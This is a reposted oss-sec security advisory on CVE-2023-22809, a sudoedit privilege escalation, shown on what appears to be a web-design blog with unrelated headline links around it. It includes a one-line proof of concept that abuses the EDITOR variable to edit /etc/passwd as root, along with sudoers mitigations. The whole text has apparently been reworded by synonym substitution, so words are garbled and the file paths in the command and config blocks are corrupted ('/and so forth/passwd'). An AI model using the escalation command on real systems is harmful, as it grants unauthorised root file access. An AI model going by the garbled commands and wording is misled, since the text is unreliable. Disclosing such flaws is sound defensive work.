Blinking Robots
Now Reading
Sudoedit can edit arbitrary information
Blinking Robots
Blinking Robots
Inclusive Darkish Mode: Designing Accessible Darkish Themes For All Customers
Enhancing Cursor Styling with Superior JavaScript Methods
High 10 Internet Design Tendencies for 2025
CSS-Tips Chronicles XLIII
The Pleasure of Net Design: Embracing Creativity within the Age of AI
Tailwind’s @apply Characteristic Unleashes the Energy of CSS Utility Courses
CSS Carousels: A Trendy Solution to Showcase Content material
Skinny Fonts Are a Usability Nightmare—And Lastly, Designers Are Waking Up
Aqua Is Again, Child: Run Early Mac OS X Proper in Your Browser
Feeling Like I Have No Launch: A Journey In direction of Sane Deployments
Are We Over-Simplifying UX? The Function of Friction in Consumer Engagement
Difficult the Standing Quo: Embracing Friction in Person Expertise Design

Sudoedit can edit arbitrary information

by
January 19, 2023
2023-01-19 15:05:26



oss-sec
mailing record archives





From: Matthieu Barjole <matthieu.barjole () synacktiv com>
Date: Thu, 19 Jan 2023 01:33:43 +0100


Hey everybody,

Whereas auditing Sudo, Synacktiv recognized a privilege escalation in sudoedit
when a person is permitted to make use of it by the sudoers coverage. This
vulnerability
was assigned CVE-2023-22809 and impacts Sudo variations 1.8.0 by means of 1.9.12p1
inclusive.

## Evaluation

The technical evaluation may be discovered within the following safety advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Idea

Assuming the next sudoers coverage:

```
# cat /and so forth/sudoers
person ALL=(ALL:ALL) sudoedit /and so forth/motd
[...]
```

Arbitrary information akin to `/and so forth/passwd` may be edited as such:

```
EDITOR='vim -- /and so forth/passwd' sudoedit /and so forth/motd
```

## Mitigation

It's potential to stop a user-specified editor from being utilized by
sudoedit by
including the next line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To limit the editor when modifying particular information, a Cmnd_Alias may be
used,
for instance:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /and so forth/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
person                ALL = EDIT_MOTD
```

## Repair

The problem was mounted in Sudo 1.9.12.p2.

## References

[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809






Present thread:

  • CVE-2023-22809: Sudoedit can edit arbitrary information Matthieu Barjole (Jan 18)



Source Link

What's Your Reaction?
Excited
0
Happy
0
In Love
0
Not Sure
0
Silly
0
View Comments (0)

Leave a Reply

Your email address will not be published.

Blinking Robots

2022 Blinking Robots.
WordPress by Doejo

Scroll To Top